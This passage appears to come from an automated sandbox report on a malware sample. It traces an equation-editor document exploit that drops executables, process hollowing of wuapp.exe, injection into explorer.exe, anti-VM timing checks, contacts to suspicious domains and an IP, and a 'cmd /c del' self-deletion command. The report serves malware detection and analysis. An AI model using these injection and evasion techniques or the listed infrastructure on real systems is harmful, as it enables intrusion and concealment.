          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_009061EC push FFFFFFF0h; ret 2_2_00906398
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00906330 push FFFFFFF0h; ret 2_2_00906398
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009AF225 push ecx; ret 5_2_009AF238
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E9E6 push edx; ret 6_2_0041E9EE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00416B6D push ebx; ret 6_2_00416B85
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4F2 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4FB push eax; ret 6_2_0041D562
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D4A5 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041D55C push eax; ret 6_2_0041D562
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EEB5 push esi; ret 6_2_0041F0D9
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009AF225 push ecx; ret 6_2_009AF238
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6DFA1 push ecx; ret 8_2_01F6DFB4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4A5 push eax; ret 8_2_000AD4F8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4FB push eax; ret 8_2_000AD562
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD4F2 push eax; ret 8_2_000AD4F8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD55C push eax; ret 8_2_000AD562
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AE9E6 push edx; ret 8_2_000AE9EE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000A6B6D push ebx; ret 8_2_000A6B85
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEEB5 push esi; ret 8_2_000AF0D9
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DDA
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3044Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exe TID: 2212Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeAPI coverage: 7.9 %
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405426
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,4_2_00405D9C
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004026A1 FindFirstFileA,4_2_004026A1
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_4-3361
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.1025894713.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: word.exe, 00000004.00000002.945543583.0000000000564000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.935522782.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.1026232834.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,5_2_009A320D
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,5_2_009A320D
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DDA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_009B6AAA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F03F8 mov eax, dword ptr fs:[00000030h]5_2_000F03F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F061D mov eax, dword ptr fs:[00000030h]5_2_000F061D
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F06F7 mov eax, dword ptr fs:[00000030h]5_2_000F06F7
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0736 mov eax, dword ptr fs:[00000030h]5_2_000F0736
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0772 mov eax, dword ptr fs:[00000030h]5_2_000F0772
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h]6_2_00A126F8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F726F8 mov eax, dword ptr fs:[00000030h]8_2_01F726F8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0040ACE0 LdrLoadDll,6_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B1D57 SetUnhandledExceptionFilter,5_2_009B1D57
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_009B1D88
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_009B1D88
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B1D57 SetUnhandledExceptionFilter,6_2_009B1D57

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exeNetwork Connect: 98.137.244.37 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.storyofsol.com
          Source: C:\Windows\explorer.exeDomain query: www.createacarepack.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfwJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfwJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"Jump to behavior
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_009A3663
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_009BE8C3
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_2_009BE970
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,5_2_009BE1D4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_2_009BE970
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_009B8969
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_009A419C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_2_009BEA44
